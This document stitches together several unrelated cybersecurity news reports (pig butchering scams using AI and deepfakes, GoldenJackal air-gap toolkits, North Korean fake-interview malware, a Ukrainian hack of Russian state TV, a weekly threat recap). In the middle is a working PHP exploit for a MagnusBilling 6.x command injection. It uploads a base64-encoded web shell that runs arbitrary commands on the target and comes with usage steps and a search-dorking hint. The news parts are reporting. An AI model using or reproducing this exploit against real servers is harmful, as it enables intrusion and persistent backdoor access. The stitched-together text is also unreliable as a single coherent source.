Scammers in Southeast Asia are increasingly turning to AI, deepfakes, and dangerous malware in a way that makes their pig butchering operations even more convincing.

As digital scamming explodes in Southeast Asia, including so called “pig butchering” investment scams, the United Nations Office on Drugs and Crime (UNODC) issued a comprehensive report this week with a dire warning about the rapid growth of this criminal ecosystem. Many digital scams have traditionally relied on social engineering, or tricking victims into giving away their money willingly, rather than leaning on malware or other highly technical methods. But researchers have increasingly sounded the alarm that scammers are incorporating generative AI content and deepfakes to expand the scale and effectiveness of their operations. And the UN report offers the clearest evidence yet that these high tech tools are turning an already urgent situation into a crisis.

In addition to buying written scripts to use with potential victims or relying on templates for malicious websites, attackers have increasingly been leaning on generative AI platforms to create communication content in multiple languages and deepfake generators that can create photos or even video of nonexistent people to show victims and enhance verisimilitude. Scammers have also been expanding their use of tools that can drain a victim’s cryptocurrency wallets, have been manipulating transaction records to trick targets into sending cryptocurrency to the wrong places, and are compromising smart contracts to steal cryptocurrency. And in some cases, they’ve been purchasing Elon Musk’s Starlink satellite internet systems to help power their efforts.

“Agile criminal networks are integrating these new technologies faster than anticipated, driven by new online marketplaces and service providers which have supercharged the illicit service economy,” John Wojcik, a UNODC regional analyst, tells WIRED. “These developments have not only expanded the scope and efficiency of cyber-enabled fraud and cybercrime, but they have also lowered the barriers to entry for criminal networks that previously lacked the technical skills to exploit more sophisticated and profitable methods.”

For years, China-linked criminals have trafficked people into gigantic compounds in Southeast Asia, where they are often forced to run scams, held against their will, and beaten if they refuse instructions. Around 200,000 people, from at least 60 countries, have been trafficked to compounds largely in Myanmar, Cambodia, and Laos over the last five years. However, as WIRED reporting has shown, these operations are spreading globally—with scamming infrastructure emerging in the Middle East, Eastern Europe, Latin America, and West Africa.

Most prominently, these organized crime operations have run pig butchering scams, where they build intimate relationships with victims before introducing an “investment opportunity” and asking for money. Criminal organizations may have conned people out of around $75 billion through pig butchering scams. Aside from pig butchering, according to the UN report, criminals across Southeast Asia are also running job scams, law enforcement impersonation, asset recovery scams, virtual kidnappings, sextortion, loan scams, business email compromise, and other illicit schemes. Criminal networks in the region earned up to $37 billion last year, UN officials estimate. Perhaps unsurprisingly, all of this revenue is allowing scammers to expand their operations and diversify, incorporating new infrastructure and technology into their systems in the hope of making them more efficient and brutally effective.

For example, scammers are often constrained by their language skills and ability to keep up conversations with potentially hundreds of victims at a time in numerous languages and dialects. However, generative AI developments within the last two years—including the launch of writing tools such as ChatGPT—are making it easier for criminals to break down language barriers and create the content needed for scamming.

The UN’s report says AI can be used for automating phishing attacks that ensnare victims, the creation of fake identities and online profiles, and the crafting of personalized scripts to trick victims while messaging them in different languages. “These developments have not only expanded the scope and efficiency of cyber-enabled fraud and cybercrime, but they have also lowered the barriers to entry for criminal networks that previously lacked the technical skills to exploit sophisticated and profitable methods,” the report says.

Stephanie Baroud, a criminal intelligence analyst in Interpol’s human trafficking unit, says the impact of AI needs to be considered as part of a pig butchering scammer’s tactics going forward. Baroud, who spoke with WIRED in an interview before the publication of the UN report, says the criminal’s recruitment ads that lure people into being trafficked to scamming compounds used to be “very generic” and full of grammatical errors. However, AI is now making them appear more polished and compelling, Baroud says. “It is really making it easier to create a very realistic job offer,” she says. “Unfortunately, this will make it much more difficult to identify which is the real and which is the fake ads.”

Perhaps the biggest AI paradigm shift in such digital attacks comes from deepfakes. Scammers are increasingly using machine-learning systems to allow for real-time face-swapping. This technology, which has also been used by romance scammers in West Africa, allows criminals to change their appearance on calls with their victims, making them realistically appear to be a different person. The technology is allowing “one-click” face swaps and high-resolution video feeds, the UN’s report states. Such services are a game changer for scammers, because they allow attackers to “prove” to victims in photos or real-time video calls that they are who they claim to be.

Using these setups, however, can require stable internet connections, which can be harder to maintain within some regions where pig butchering compounds and other scamming have flourished. There has been a “notable” increase in cops seizing Starlink satellite dishes in recent months in Southeast Asia, the UN says—80 units were seized between April and June this year. In one such operation carried out in June, Thai police confiscated 58 Starlink devices. In another instance, law enforcement seized 10 Starlink devices and 4,998 preregistered SIM cards while criminals were in the process of moving their operations from Myanmar to Laos. Starlink did not immediately respond to WIRED’s request for comment.

“Obviously using real people has been working for them very well, but using the tech could be cheaper after they have the required computers” and connectivity, says Troy Gochenour, a volunteer with the Global Anti-Scam Organization (GASO), a US-based nonprofit that fights human-trafficking and cybercrime operations in Southeast Asia.

Gochenour’s research involves tracking trends on Chinese-language Telegram channels related to carrying out pig butchering scams. And he says that it is increasingly common to see people applying to be AI models for scam content.

In addition to AI services, attackers have increasingly leaned on other technical solutions as well. One tool that has been increasingly common in digital scamming is so-called “crypto drainers,” a type of malware that has particularly been deployed against victims in Southeast Asia. Drainers can be more or less technically sophisticated, but their common goal is to “drain” funds from a target’s cryptocurrency wallets and redirect the currency to wallets controlled by attackers. Rather than stealing the credentials to access the target wallet directly, drainers are typically designed to look like a legitimate service—either by impersonating an actual platform or creating a plausible brand. Once a victim has been tricked into connecting their wallet to the drainer, they are then manipulated into approving one or a few transactions that grant attackers unintended access to all the funds in the wallet.

Drainers can be used in many contexts and with many fronts. They can be a component of pig butchering investment scams, or promoted to potential victims through compromised social media accounts, phishing campaigns, and malvertizing. Researchers from the firm ScamSniffer, for example, published findings in December about sponsored social media and search engine ads linked to malicious websites that contained a cryptocurrency drainer. The campaign, which ran from March to December 2023 reportedly stole about $59 million from more than 63,000 victims around the world.

Far from the low-tech days of doing everything through social engineering by building a rapport with potential victims and crafting tricky emails and text messages, today’s scammers are taking a hybrid approach to make their operations as efficient and lucrative as possible, UN researchers say. And even if they aren’t developing sophisticated malware themselves in most cases, scammers are increasingly in the market to use these malicious tools, prompting malware authors to adapt or create hacking tools for scams like pig butchering.

Researchers say that scammers have been seen using infostealers and even remote access trojans that essentially create a backdoor in a victim’s system that can be utilized in other types of attacks. And scammers are also expanding their use of malicious smart contracts that appear to programmatically establish a certain agreed-upon transaction or set of transactions, but actually does much more. “Infostealer logs and underground data markets have also been critical to ongoing market expansion, with access to unprecedented amounts of sensitive data serving as a major catalyst,” Wojcik, from the UNODC, says.

The changing tactics are significant as global law enforcement scrambles to deter digital scamming. But they are just one piece of the larger picture, which is increasingly urgent and bleak for forced laborers and victims of these crimes.

“It is now increasingly clear that a potentially irreversible displacement and spillover has taken place in which organized crime are able to pick, choose, and move value and jurisdictions as needed, with the resulting situation rapidly outpacing the capacity of governments to contain it,” UN officials wrote in the report. “Failure to address this ecosystem will have consequences for Southeast Asia and other regions.”

Pig Butchering Scams Are Going High Tech

It's hard enough creating one air-gap-jumping tool. Researchers say the group GoldenJackal did it twice in five years.

Researchers have unearthed two sophisticated tool sets that a nation-state hacking group—possibly from Russia—used to steal sensitive data stored on air-gapped devices, meaning those that are deliberately isolated from the internet or other networks to safeguard them from malware.

One of the custom tool collections was used starting in 2019 against a South Asian embassy in Belarus. A largely different tool set created by the same threat group infected a European Union government organization three years later. Researchers from ESET, the security firm that discovered the toolkits, said some of the components in both were identical to those fellow security firm Kaspersky described in research published last year and attributed to an unknown group, tracked as GoldenJackal, working for a nation-state. Based on the overlap, ESET has concluded that the same group is behind all the attacks observed by both firms.

**Quite Unusual**

The practice of air gapping is typically reserved for the most sensitive networks or devices connected to them, such as those used in systems for voting, industrial control, manufacturing, and power generation. A host of malware used in espionage hacking over the past 15 years (for instance, here and here) demonstrate that air gapping isn’t a foolproof protection. It nonetheless forces threat groups to expend significant resources that are likely obtainable only by nation-states with superior technical acumen and unlimited budgets. ESET’s discovery puts GoldenJackal in a highly exclusive collection of threat groups.

“With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one but two separate tool sets designed to compromise air-gapped systems,” ESET researcher Matías Porolli wrote in Tuesday’s report. “This speaks to the resourcefulness of the group.”

The evolution of the kit from 2019 and the one from three years later underscores a growing sophistication by GoldenJackal developers. The first generation provided a full suite of capabilities, including:

*   GoldenDealer, a component that delivers malicious executables to air-gapped systems over USB drives
*   GoldenHowl, a backdoor that contains various modules for a mix of malicious capabilities
*   GoldenRobo, a file collector and exfiltrator

Within a few weeks of deploying the kit in 2019, ESET said, GoldenJackal started using other tools on the same compromised devices. The newer tools, which Kaspersky documented in its 2023 research, included:

*   A backdoor tracked under the name JackalControl
*   JackalSteal, a file collector and exfiltrator
*   JackalWorm, used to propagate other JackalControl and other malicious components over USB drives

GoldenJackal, ESET said, continued using these tools into January of this year. The basic flow of the attack is, first, infecting an internet-connected device through a means ESET and Kaspersky have been unable to determine. Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the internet-connected device, the data is transferred to an attacker-controlled server.

**Building a Better Trap**

In the 2022 attack on the European Union governmental organization, GoldenJackal began using a new custom toolkit. Written in multiple programming languages, including Go and Python, the newer version took a much more specialized approach. It assigned different tasks to different types of infected devices and marshaled a much larger array of modules, which could be mixed and matched based on the attacker objects for different infections.

“In the observed attacks, GoldenJackal started to use a highly modular approach, using various components to perform different tasks,” ESET’s Porolli wrote. “Some hosts were abused to exfiltrate files, others were used as local servers to receive and distribute staged files or configuration files, and others were deemed interesting for file collection, for espionage purposes.”

The figure below classifies some of the components specifically:

*   GoldenUsbCopy, which monitors for the insertion of USB drives on air-gapped devices and, when found, copies them to an encrypted container that is stored on disk
*   GoldenUsbGo, which appears to be an updated version of GoldenUSBCopy
*   GoldenAce, a distribution tool for propagating other malicious executables and retrieving files stored on USB drives
*   HTTP server, an HTTP server whose precise function isn’t well understood
*   ​​GoldenBlacklist, which downloads an encrypted archive from a local server, sifts through received email messages for those of interest, and puts them in an archive for some other component to exfiltrate
*   GoldenPyBlacklist, a Python implementation of GoldenBlacklist
*   GoldenMailer, which, when connected to an internet device, exfiltrates files of interest previously stolen from an air-gapped device. The exfiltration occurs by attaching them to emails sent to an attacker-controlled email address
*   GoldenDrive, a separate exfiltration tool that, in contrast to GoldenMailer, uploads files of interest to Google Drive.

The newly discovered toolkit is composed of many different building blocks, written in multiple languages and capabilities. The overall goal appears to be increased flexibility and resiliency in the event one module is detected by the target.

“Their goal is to get hard to obtain data from air-gapped systems and stay under the radar as much as possible,” Costin Raiu, a researcher who worked at Kaspersky at the time it was researching GoldenJackal, wrote in an interview. “Multiple exfiltration mechanisms indicate a very flexible tool kit that can accommodate all sorts of situations. These many tools indicate it’s a highly customizable framework where they deploy exactly what they need as opposed to a multi purpose malware that can do anything.”

Other new insights offered by the ESET research is GoldenJackal’s interest in targets located in Europe. Kaspersky researchers detected the group targeting Middle Eastern countries.

Based on the information that was available to Kaspersky, company researchers couldn’t attribute GoldenJackal to any specific country. ESET has also been unable to definitively identify the country, but it did find one hint that the threat group may have a tie to Turla, a potent hacking group working on behalf of Russia’s FSB intelligence agency. The tie comes in the form of command-and-control protocol in GoldenHowl referred to as transport\_http. The same expression is found in malware known to originate with Turla.

Raiu said the highly modular approach is also reminiscent of Red October, an elaborate espionage platform discovered in 2013 targeting hundreds of diplomatic, governmental, and scientific organizations in at least 39 countries, including the Russian Federation, Iran, and the United States.

While much of Tuesday’s report contains technical analysis that is likely to be too advanced for many people to understand, it provides important new information that furthers insights into malware designed to jump air gaps and the tactics, techniques, and procedures of those who use it. The report will also be useful to people responsible for safeguarding the types of organizations most frequently targeted by nation-state groups.

“I’d say this is mostly interesting for security people working in embassies and government CERTs,” Raiu said. “They need to check for these TTPs and keep an eye on them in the future. If you were previously a victim of Turla or Red October I’d keep an eye on this.”

_This story originally appeared on_ _Ars Technica._

A Mysterious Hacking Group Has 2 New Tools to Steal Data From Air-Gapped Machines

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 6.x Code Injection 

Threat actors with ties to North Korea have been observed targeting job seekers in the tech industry to deliver updated versions of known malware families tracked as BeaverTail and InvisibleFerret.
The activity cluster, tracked as CL-STA-0240, is part of a campaign dubbed Contagious Interview that Palo Alto Networks Unit 42 first disclosed in November 2023.
"The threat actor behind CL-STA-0240

Phishing Attack / Malware

Threat actors with ties to North Korea have been observed targeting job seekers in the tech industry to deliver updated versions of known malware families tracked as BeaverTail and InvisibleFerret.

The activity cluster, tracked as CL-STA-0240, is part of a campaign dubbed **Contagious Interview** that Palo Alto Networks Unit 42 first disclosed in November 2023.

"The threat actor behind CL-STA-0240 contacts software developers through job search platforms by posing as a prospective employer," Unit 42 said in a new report.

"The attackers invite the victim to participate in an online interview, where the threat actor attempts to convince the victim to download and install malware."

The first stage of infection involves the BeaverTail downloader and information stealer that's designed for targeting both Windows and Apple macOS platforms. The malware acts as a conduit for the Python-based InvisibleFerret backdoor.

There is evidence to suggest that the activity remains active despite public disclosure, indicating that the threat actors behind the operation are continuing to taste success by enticing developers into executing malicious code under the pretext of a coding assignment.

Security researcher Patrick Wardle and cybersecurity company Group-IB, in two recent analyses, detailed an attack chain that leveraged fake Windows and maCOS video conferencing applications impersonating MiroTalk and FreeConference.com to infiltrate developer systems with BeaverTail and InvisibleFerret.

What makes it noteworthy is that the bogus application is developed using Qt, which supports cross-compilation for both Windows and macOS. The Qt-based version of BeaverTail is capable of stealing browser passwords and harvesting data from several cryptocurrency wallets.

BeaverTail, besides exfiltrating the data to an adversary-controlled server, is equipped to download and execute the InvisibleFerret backdoor, which includes two components of its own -

*   A main payload that enables fingerprinting of the infected host, remote control, keylogging, data exfiltration, and downloading of AnyDesk
*   A browser stealer that collects browser credentials and credit card information

"North Korean threat actors are known to conduct financial crimes for funds to support the DPRK regime," Unit 42 said. "This campaign may be financially motivated, since the BeaverTail malware has the capability of stealing 13 different cryptocurrency wallets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware

A little-known threat actor tracked as GoldenJackal has been linked to a series of cyber attacks targeting embassies and governmental organizations with an aim to infiltrate air-gapped systems using two disparate bespoke toolsets.
Victims included a South Asian embassy in Belarus and a European Union government (E.U.) organization, Slovak cybersecurity company ESET said.
"The ultimate goal of

A little-known threat actor tracked as **GoldenJackal** has been linked to a series of cyber attacks targeting embassies and governmental organizations with an aim to infiltrate air-gapped systems using two disparate bespoke toolsets.

Victims included a South Asian embassy in Belarus and a European Union government (E.U.) organization, Slovak cybersecurity company ESET said.

"The ultimate goal of GoldenJackal seems to be stealing confidential information, especially from high-profile machines that might not be connected to the internet," security researcher Matías Porolli noted in an exhaustive analysis.

GoldenJackal first came to light in May 2023, when Russian security vendor Kaspersky detailed the threat cluster's attacks on government and diplomatic entities in the Middle East and South Asia. The adversary's origins stretch back to at least 2019.

An important characteristic of the intrusions is the use of a worm named JackalWorm that's capable of infecting connected USB drives and delivering a trojan dubbed JackalControl.

While there is insufficient information to conclusively tie the activities to a specific nation-state threat, there is some tactical overlap with malicious tools used in campaigns linked to Turla and MoustachedBouncer, the latter of which has also singled out foreign embassies in Belarus.

ESET said it discovered GoldenJackal artifacts at a South Asian embassy in Belarus in August and September 2019, and again in July 2021. Of particular interest is how the threat actor also managed to deploy a completely revamped toolset between May 2022 and March 2024 against an E.U. government entity.

"With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one, but two separate toolsets designed to compromise air-gapped systems," Porolli pointed out. "This speaks to the resourcefulness of the group."

The attack against the South Asian embassy in Belarus is said to have made use of three different malware families, in addition to JackalControl, JackalSteal, and JackalWorm -

*   **GoldenDealer**, which is used to deliver executables to the air-gapped system via compromised USB drives
*   **GoldenHowl**, a modular backdoor with capabilities to steal files, create scheduled tasks, upload/download files to and from a remote server, and create an SSH tunnel, and
*   **GoldenRobo**, a file collector and data exfiltration tool

The attacks targeting the unnamed government organization in Europe, on the other hand, have been found to rely on an entirely new set of malware tools mostly written in Go. They are engineered to collect files from USB drives, spread malware via USB drives, exfiltrate data, and use some machine servers as staging servers to distribute payloads to other hosts -

*   **GoldenUsbCopy** and its improved successor **GoldenUsbGo**, which monitor USB drives and copy files for exfiltration
*   **GoldenAce**, which is used to propagate the malware, including a lightweight version of JackalWorm, to other systems (not necessarily those that are air-gapped) using USB drives
*   **GoldenBlacklist** and its Python implementation **GoldenPyBlacklist**, which are designed to process email messages of interest for subsequent exfiltration
*   **GoldenMailer**, which sends the stolen information to attackers via email
*   **GoldenDrive**, which uploads stolen information to Google Drive

It's currently not known as to how GoldenJackal manages to gain initial compromise to breach target environments. However, Kaspersky previously alluded to the possibility of trojanized Skype installers and malicious Microsoft Word documents as entry points.

GoldenDealer, which is already present in a computer connected to the internet and delivered via an as-yet-undetermined mechanism, springs into action when a USB drive is inserted, causing itself and an unknown worm component to be copied into the removable device.

It's suspected that the unknown component is executed when the infected USB drive is connected to the air-gapped system, following which GoldenDealer saves information about the machine to the USB drive.

When the USB device is inserted into the aforementioned internet-connected machine a second time, GoldenDealer passes the information stored in the drive to an external server, which then responds with appropriate payloads to be run on the air-gapped system.

The malware is also responsible for copying the downloaded executables to the USB drive. In the last stage, when the device is connected to the air-gapped machine again, GoldenDealer takes the copied executables and runs them.

For its part, GoldenRobo is also executed on the internet-connected PC and is equipped to take the files from the USB drive and transmit them to the attacker-controlled server. The malware, written in Go, gets its name from the use of a legitimate Windows utility called robocopy to copy the files.

ESET said it has yet to uncover a separate module that takes care of copying the files from the air-gapped computer to the USB drive itself.

"Managing to deploy two separate toolsets for breaching air-gapped networks in only five years shows that GoldenJackal is a sophisticated threat actor aware of network segmentation used by its targets," Porolli said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GoldenJackal Target Embassies and Air-Gapped Systems Using Malware Toolsets

Ukraine has claimed responsibility for a cyber attack that targeted Russia state media company VGTRK and disrupted its operations, according to reports from Bloomberg and Reuters.
The incident took place on the night of October 7, VGTRK confirmed, describing it as an "unprecedented hacker attack." However, it said "no significant damage" was caused and that everything was working normally

Ukraine has claimed responsibility for a cyber attack that targeted Russia state media company VGTRK and disrupted its operations, according to reports from Bloomberg and Reuters.

The incident took place on the night of October 7, VGTRK confirmed, describing it as an "unprecedented hacker attack." However, it said "no significant damage" was caused and that everything was working normally despite attempts to interrupt radio and TV broadcasts.

That said, Russian media outlet Gazeta.ru reported that the hackers wiped "everything" from the company's servers, including backups, citing an anonymous source.

A source told Reuters that "Ukrainian hackers 'congratulated' Putin on his birthday by carrying out a large-scale attack on the all-Russian state television and radio broadcasting company."

The attack is believed to be the work of a pro-Ukrainian hacker group called Sudo rm-RF. The Russian government has since said an investigation into the attack is ongoing and that it "aligns with the anti-Russian agenda of the West."

The development comes amid continued cyber attacks targeting both Russia and Ukraine against the backdrop of the Russo-Ukrainian war that commenced in February 2022.

Ukraine's State Service of Special Communications and Information Protection (SSSCIP), in a report published late last month, said it has observed an increase in the number of cyber attacks targeting security, defense, and energy sectors, with 1,739 incidents registered in the first half of 2024 reaching, up 19% from 1,463 in the previous half.

Forty-eight of those attacks have been deemed either critical or high in severity level. Over 1,600 incidents have been classified as medium and 21 have been tagged as low in severity. The number of critical severity incidents witnessed a drop from 31 in H2 2023 to 3 in H1 2024.

Over the past two years, adversaries have pivoted from staging destructive attacks to securing covert footholds to extract sensitive information, the agency said.

"In 2024, we observe a pivot in their focus towards anything directly connected to the theater of war and attacks on service provider — aimed at maintaining a low profile, sustaining a presence in systems related to war and politics," Yevheniya Nakonechna, head of State Cyber Protection Centre of the SSSCIP, said.

"Hackers are no longer just exploiting vulnerabilities wherever they can but are now targeting areas critical to the success and support of their military operations."

The attacks have been primarily attributed to eight different activity clusters, one of which includes a China-linked cyber espionage actor tracked as UAC-0027 that was observed deploying a malware strain called DirtyMoe to conduct cryptojacking and DDoS attacks.

SSSCIP has also highlighted intrusion campaigns staged by a Russian state-sponsored hacking group dubbed UAC-0184, pointing out its track record of initiating communications with prospective targets using messaging apps like Signal with the goal of distributing malware.

Another threat actor that has remained laser-focused on Ukraine is Gamaredon, a Russian hacking crew that's also known as Aqua Blizzard (previously Actinium), Armageddon, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder.

"The intensity of the physical conflict has noticeably increased since 2022, but it's worth noting that the level of activity from Gamaredon has remained consistent – the group has been methodically deploying its malicious tools against its targets since well before the invasion began," Slovak cybersecurity firm ESET said in an analysis.

Notable among the malware families is an information stealer called PteroBleed, which also relies on an arsenal of downloaders, droppers, weaponizers, backdoors, and other ad hoc programs to facilitate payload delivery, data exfiltration, remote access, and propagation via connected USB drives.

"Gamaredon has also demonstrated resourcefulness by employing various techniques to evade network-based detections, leveraging third-party services such as Telegram, Cloudflare, and ngrok," security researcher Zoltán Rusnák said. "Despite the relative simplicity of its tools, Gamaredon's aggressive approach and persistence make it a significant threat."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.
Get the scoop before it's too late!
⚡ Threat of the Week
Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

Cybersecurity / Weekly Recap

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.

Get the scoop before it's too late!

****⚡ Threat of the Week****

**Double Trouble: Evil Corp & LockBit Fall:** A consortium of international law enforcement agencies took steps to arrest four people and take down nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation. In tandem, authorities outed a Russian national named Aleksandr Ryzhenkov, who was one of the high-ranking members of the Evil Corp cybercrime group and also a LockBit affiliate. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K.

  
****🔔 Top News****

*   **DoJ & Microsoft Seize 100+ Russian Hacker Domains:** The U.S. Department of Justice (DoJ) and Microsoft announced the seizure of 107 internet domains used by a Russian state-sponsored threat actor called COLDRIVER to orchestrate credential harvesting campaigns targeting NGOs and think tanks that support government employees and military and intelligence officials.
*   **Record-Breaking 3.8 Tbps DDoS Attack:** Cloudflare revealed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at 3.8 terabits per second (Tbps) and lasted 65 seconds. The attack is part of a broader wave of over a hundred hyper-volumetric L3/4 DDoS attacks that have been ongoing since early September 2024 targeting financial services, Internet, and telecommunication industries. The activity has not been attributed to any specific threat actor.
*   **North Korean Hackers Deploy New VeilShell Trojan:** A North Korea-linked threat actor called APT37 has been attributed as behind a stealthy campaign targeting Cambodia and likely other Southeast Asian countries that deliver a previously undocumented backdoor and remote access trojan (RAT) called VeilShell. The malware is suspected to be distributed via spear-phishing emails.
*   **Fake Trading Apps on Apple and Google Stores:** A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims as part of what's called a pig butchering scam. The apps are no longer available for download. The campaign has been found to target users across Asia-Pacific, Europe, Middle East, and Africa. In a related development, Gizmodo reported that Truth Social users have lost hundreds of thousands of dollars to pig butchering scams.
*   **700,000+ DrayTek Routers Vulnerable to Remote Attacks:** As many as 14 security flaws, dubbed DRAY:BREAK, have been uncovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. The vulnerabilities have been patched following responsible disclosure.

****📰 Around the Cyber World****

*   **Salt Typhoon Breached AT&T, Verizon, and Lumen Networks:** A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. "The hackers appear to have engaged in a vast collection of internet traffic from internet service providers that count businesses large and small, and millions of Americans, as their customers."
*   **U.K. and U.S. Warn of Iranian Spear-Phishing Activity:** Cyber actors working on behalf of the Iranian Government's Islamic Revolutionary Guard Corps (IRGC) have targeted individuals with a nexus to Iranian and Middle Eastern affairs to gain unauthorized access to their personal and business accounts using social engineering techniques, either via email or messaging platforms. "The actors often attempt to build rapport before soliciting victims to access a document via a hyperlink, which redirects victims to a false email account login page for the purpose of capturing credentials," the agencies said in an advisory. "Victims may be prompted to input two-factor authentication codes, provide them via a messaging application, or interact with phone notifications to permit access to the cyber actors."
*   **NIST NVD Backlog Crisis - 18,000+ CVEs Unanalyzed:** A new analysis has revealed that the National Institute of Standards and Technology (NIST), the U.S. government standards body, has still a long way to go in terms of analyzing newly published CVEs. As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." It's worth noting that a total of 25,357 new vulnerabilities have been added to NVD since February 12, 2024, when NIST scaled back its processing and enrichment of new vulnerabilities.
*   **Major RPKI Flaws Uncovered in BGP's Cryptographic Defense:** A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." These vulnerabilities range from denial-of-service and authentication bypass to cache poisoning and remote code execution.
*   **Telegram's Data Policy Shift Pushes Cybercriminals to Alternative Apps:** Telegram's recent decision to give users' IP addresses and phone numbers to authorities in response to valid legal requests is prompting cybercrime groups to seek other alternatives to the messaging app, including Jabber, Tox, Matrix, Signal, and Session. The Bl00dy ransomware gang has declared that it's "quitting Telegram," while hacktivist groups like Al Ahad, Moroccan Cyber Aliens, and RipperSec have expressed an intent to move to Signal and Discord. That said, neither Signal nor Session support bot functionality or APIs like Telegram nor do they have extensive group messaging capabilities. Jabber and Tox, on the other hand, have already been used by adversaries operating on underground forums. "Telegram's expansive global user base still provides extensive reach, which is crucial for cybercriminal activities such as disseminating information, recruiting associates or selling illicit goods and services," Intel 471 said. Telegram CEO Pavel Durov, however, has downplayed the changes, stating "little has changed" and that it has been sharing data with law enforcement since 2018 in response to valid legal requests. "For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3," Durov added.

**🔥 **Cybersecurity Resources & Insights****

*   **LIVE Webinars**
    *   **Modernization of Authentication: Passwords vs Passwordless and MFA:** Are you sure your passwords are enough? Discover the truth about passwordless tech and how MFA can protect you in ways you didn't even know you needed. Join our webinar to get ahead of the next big shift in cybersecurity.
*   **Ask the Expert**
    *   **Q: How can organizations reduce compliance costs while strengthening their security measures?**
